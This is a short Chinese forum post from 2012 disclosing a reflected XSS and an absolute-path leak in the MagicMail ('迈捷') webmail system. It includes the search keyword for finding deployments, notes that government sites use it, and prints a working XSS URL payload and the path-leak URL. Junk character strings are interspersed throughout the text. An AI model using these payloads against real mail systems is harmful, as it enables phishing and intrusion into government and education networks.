今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞 O' c3 x3 Y$ K5 g+ v8 r" g4 D
0 J' f" b0 w+ g( a/ h- L4 S2 p( D
5 ]8 s, C6 w/ m9 d6 e7 w L8 f
包含 一个反射性XSS 以及 绝对路径泄漏
- G- _2 c2 G. ~9 \ `看了看 貌似全部是linux的。
" \7 b7 N3 z @) b# W1 N
% `8 j; c; K$ N! w关键字:迈捷邮件系统 by MagicMail
$ Y1 b- S2 s, H# J' o" I
# V! ^" t$ ]- [1 W! O可以看到很多政府网站都用这个邮件系统9 c/ C; z7 f; Z+ ~! p% A2 S- ^9 D
. Y2 \: X# N$ k9 K* \绝对路径 http://madman.in/index.php?login_type=declare&language=
! B* u/ ]0 D+ n5 a5 L5 r' a9 i; L: @2 @ I! T/ u
1 l3 E$ K7 F4 y1 j1 N: t2 ~
! \7 O0 I9 B7 r
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
4 p% o6 s% C& I9 @/ G! Y, G) b- w
8 }7 z' {2 d: Z6 p3 q8 X! o* @4 I
3 Z; T' }: _" ?, a6 S* O) T虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
" m, e- c- I/ f8 p" b+ T& D( G6 l 0 d0 O, Y! @. Y" e' @, K, p
修复方案:看官方补丁吧。 y( V3 R" i! X) m
|
发表于 2012-11-9 20:38:41
收藏
支持
反对